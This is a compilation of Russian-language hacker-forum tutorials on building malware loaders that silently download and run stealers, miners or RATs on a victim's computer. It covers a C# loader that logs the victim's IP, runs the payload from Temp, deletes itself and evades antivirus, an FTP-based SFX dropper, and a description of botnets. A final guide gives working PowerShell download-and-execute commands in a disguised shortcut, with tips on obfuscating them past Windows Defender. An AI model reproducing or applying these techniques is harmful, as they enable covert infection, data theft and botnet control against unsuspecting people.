Свой лоадер на C#
DEEPSIDE
Как будет работать наш лоадер?
- Сначала, после запуска, он отправить запрос на логгер, где сохранится IP жертвы
- Далее он загрузит файл с сервера
- Потом поместит файл во временную папку (Temp) и запустится
- После чего самоудалится
Приступим.
Для начала создаём консольный проект, версия фреймворка 4.5

Сразу удаляем все юзинги, и добавляем нужные:

Логгирование.
Первым делом мы напишем функцию логгирования (отслеживания запуска файла по IP).
Создаём новый void с именем logger и переменной url:

Теперь в эту функцию (logger) добавляем переменную request, которая отвечает за web запрос:
Назначим полномочия пользователя:
Сейчас добавляем юзерагент, в данном случае это будет юзер агент браузера Firefox:
Ну и напоследок добавляем ответ от сервера:
Вот так должен выглядеть void logger:
- Загрузка, запуск, самоудаление файла.
Теперь добавим самую важную функцию лоадера — загрузка файла.
Создаём новый void с именем load, и переменными link и filename

Добавляем путь до нашего файла, у нас он будет хранится во временной папке Temp:
Добавляем переменную user, которая содержит новый WebClient:
Теперь скачиваем файл:
Метод загрузки выглядит так:

Перед тем, как напишем функцию запуска файла, нам нужно добавить функцию самоудаления. Создаём новый void с именем DeleteMe и переменной delay:

Создаём новый процесс, всё объяснение в коментариях:
Метод DeleteMe выглядит так:

Теперь сделаем метод запуска файла, работать будет через планировщик задач.
Создаём void running, с переменной pth:

Создаём переменную с новым процессом:
Добавляем аргументы для запуска:
Перенаправляем стандартный вывод:
Отключаем выполнение оболочки
Запускаем процесс без окна
И запускаем процесс
Весь метод running выглядит так:

Теперь добавим рандомную генерацию строк для void'a running.
Создаём новый void generateString:

Добавим переменную symbols, в которой содержатся символы для рандомной генерации и переменную result, в которой будет содержатся результат генерации:
Теперь сама функция генерации:
Воид generateString() выглядит так:

На этом все функции закончены, осталось добавить их в главный void (Main)
Но перед этим, нам нужна ссылка-логгер
Для этого переходим на сайт далее выбираем "Невидимый логгер"

Видим следующую страницу:

Здесь нам нужна ссылка для сбора IP адресов. Копируем её.
Возвращаемся к коду, в main пишем:
В итоге, метод Main выглядит примерно так:

Теперь, нам нужно скрыть консоль при запуске лоадера.
Заходим в свойства проекта, далее делаем как на скрине:

Выбираем "Приложение Windows". Теперь консоль не открывается и лоадер запускается скрытно.
Для чего используются лоадеры?
- Маленький размер. То есть, если ваш вирус имеет огромный вес, просто воспользуйтесь лоадером, который весит
Итог. Что мы имеем?
- Вес файла
Обфусцировав код получаем такие детекты:

Заключение.
Сегодня мы написали загрузчик вирусов на C#, рассмотрели его возможное внутреннее устройство и преследуемые цели. Думаю каждый начинающий кодер открыл для себя что то новое, удачи.
Создаем LOADER 0 детектор/FUD 0
Всем привет. Читал я тут статейки и решил выложить свою. Выложить то, что завалялось на компе. Не знаю есть ли такая тема на форуме. Если тема не в том разделе, то прошу модераторов перенести. Вообщем, сегодня будем создавать loader стандартными средствами Windows.
Итак,
1) Сначала нам нужно найти хостинг с FTP доступом. Можете взять бесплатный, можете арендовать. И загружаем на него ваш вирус/майнер/стиллер и т.д.
2) Создаем текстовый документ и называем его "ftp.txt", без кавычек. Открываем его и вставляем туда следующее:
4) После создаем файл с названием "123.cmd", без кавычек и вставляем следующее:
Сохраняем всё в одной папке.
5) Далее Выделяем эти три файла -> ПКМ -> Добавить в архив.
Далее вылезет окно WinRar, там выбираем "Метод сжатия — максимальный", изменяем имя и ставим галочки на "Создать SFX архив" и "Создать непрерывный архив" и переходим во вкладку "Комментарии" и там вставляем следующее:

И всё, жмем "ОК"
Теперь в папке с файлами появиться EXE файл, запустив его, у нас начнется скачивание файла в скрытом режиме.Посмотреть вложение 176
Ссылка на скан — ТЫК
antihack
Расскажу что такое лоадер (loader), и как он работает.
Лоадер, это одино из основных оружий хакера. Заражают этим вирусом чаще всего, через эксплойт. После заражения бот стучит в свою админку, и ждет команды хозяина. В админки боты распределяются по стране. Лоадер дает возможность хакеру, ПОДГРУЖАТЬ жертве N-oe количество файлов (обычно ехе) с последующим их выполнением (запуском). Т.о. ботнет становится под полным контролем владельца.
Лоадер будет сидеть в системе до тех пор, пока из админки не поступит команда самоудаления (чаще всего это происходит после загрузки 5-10 файлов жертве), либо пока эвристика вируса не попадет в базы антивирусных компаний.
БОТ — компьютер зараженный каким либо трояном/бэкдуром/соксом/лоадером/формгра ббером.
Заражаем компьютер вирусом с помощью простого ярлыка
В сегодняшней статье вы узнаете, как самостоятельно создать лоадер, который, в свою очередь, будет загружать наши вирусы на компьютер жертвы.
Всем салют, дорогие друзья!
Сегодня мы научим вас одному интересному приему, который, несмотря на свою простоту, используется хакерами в реальных атаках.
В этой статье вы узнаете, как самостоятельно создать лоадер, который, в свою очередь, будет загружать наши вирусы на компьютер жертвы.
-
Для начала напомним, что такое лоадер:
Лоадер — это небольшой файл, который в обход фаерволов загружает нужный нам файл (ваш вирус — стиллер, майнер, RAT и т.д.) на машину жертвы и незаметно его запускает. Грузить файлы с помощью лоадера намного лучше, чем грузить файлы сразу. Так что вещь в хакерском хозяйстве незаменимая.
Итак, за дело!
-
Первое, что нам понадобится — это совершенно любой бесплатный хостинг. Для примера мы будем использовать 000webhost.com
-
Переходим на сайт -> выбираем бесплатный тариф -> проходим стандартную регистрацию:
-
Переходим в панель управления и жмём вот так:
-
Создаем новый файл:
-
Выбираем наш файл и жмём Edit:
-
Вставляем в данный файл следующий текст и сохраняем:
Invoke-WebRequest ссылка_на_файл_вируса -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe
-
Теперь нам нужно получить ссылку на наш файл. Сделать это очень просто: жмем правой кнопкой мыши по нашему файлу и выбираем View:
-
После этого в вашем браузере откроется новое окошко. Перейдите в него и просто скопируйте ссылку из адресной строки браузера:
-
Далее идем на сайт сократителя ссылок cuti.cc и вставляем в поле ссылку на .txt файл, который мы создавали выше:
-
Отлично, у нас есть сокращенная ссылка. Не теряйте ее. Теперь создадим ярлык:
-
В путь пишем вот это:
C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content
-
Ярлык-лоадер готов!
Несколько важных моментов
-
Наверняка вам интересно, на кой черт использовать сокращатель ссылок?
Ответ прост: прописываемый в ярлыке путь имеет ограничение на длину символов. Исходная ссылка туда не влазит.
-
Как сделать, что бы Windows Defender не палил наш лоадер?
Можно использовать скрипт обфускации повершелл https://github.com/danielbohannon/Invoke-Obfuscation , с целью обфусцификации команды которую мы пишем в путь. Выглядеть она будет после этого не как выше, а вот так:
-command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content
-
Что делать дальше?
Самое время поставить на файл ярлыка иконку и написать нужное название файла. Так как у ярлыка не видно расширения, можно так же добавить и его, например, дописав в конце имени файла .txt или любое другое. Если вам нужно увеличить размер файла, то можно накачать его любым пампером.